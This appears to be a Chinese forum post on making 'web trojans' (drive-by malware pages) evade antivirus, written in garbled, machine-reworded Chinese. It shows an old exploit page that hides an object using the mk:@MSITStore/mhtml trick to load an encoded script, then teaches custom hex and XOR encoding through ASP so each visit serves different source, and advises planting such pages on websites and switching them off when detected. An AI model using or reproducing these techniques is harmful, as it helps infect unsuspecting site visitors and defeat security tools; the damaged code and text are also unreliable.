网马免杀－－－－初级摸索[网络技术]

<HTML oncontextmenu="returnfalse">
<HEAD>
<TITLE>　</TITLE>
</HEAD>
<BODY>
<SCRIPTLANGUAGE="JavaScript.Encode"src="1.js">
</SCRIPT>
<SCRIPTLANGUAGE="JavaScript">
varurl=document.location.href;url=url.substring(0,url.lastIndexOf('/'));
document.write('<OBJECTWidth=0Height=0style="display:none;"
type="text/x-scriptlet"data="mk:@MSITStore:mhtml:c:\\.mht!'+url+'/1.js::/%23">
</OBJECT>');
window.status="　";
</SCRIPT>
</BODY>
<NOSCRIPT><iframestyle="display:none;">
</HTML>

先拿一段从前对比老的网马做阐明.
很多人喜好用:escape()和unescape()来加密和解密网马.
不过终究还是被杀软杀掉.用的人太多了,不杀才怪.
也有人用Script Encoder来加密.这个当然也好办理.

我个人认为,很多情形下要的是思维.
为什么自己不写一个自定义加密算法.那么你出的网马就是唯一性的.
杀软想杀也没有办法.被杀改一下种子他又杀不了了.

我最开始用这种思绪编写网马的时刻,挂了一年的马,历来没有被杀过.
所以本日就提出这种思维吧.
办法也很简单.
原理普通是这样.
用脚本或利用程序写诞生成器.
比方:上面的代码 我们付值给S这个变量.
s="上面的代码"
目前用ASP.写个简单的自定义加密.
<%
s=wmhtmlcode
for i=1 to len(s)
        newstr=newstr & Hex(asc(mid(s,i,1)))

next
%>
目前把加密后的代码给了newstr这个变量.
我们再用JS代码举行解密并输出.
JS代码大家就自己写了.
<script>
document.write jm(<%=newstr%>);
</script>
这样就实际了加密和解密.
查看网马源代码的时刻.就不会有什么特点码.
假如被杀,稍改正一下加密算法就通过.
大概你XOR一下,值又改变了.
假如做成ASP,PHP脚本网马.
便可以实现每一次拜候网马,后果源代码内容都不相同.
本人很倡议挂马,挂脚本文件,很好掌握网马的输出状况.
发现被杀,即刻在脚本文件的第一行,终止输出.
这样站也不会掉得太快.改好了再松开,开关.
思维是很重要的.

                .....Fanney!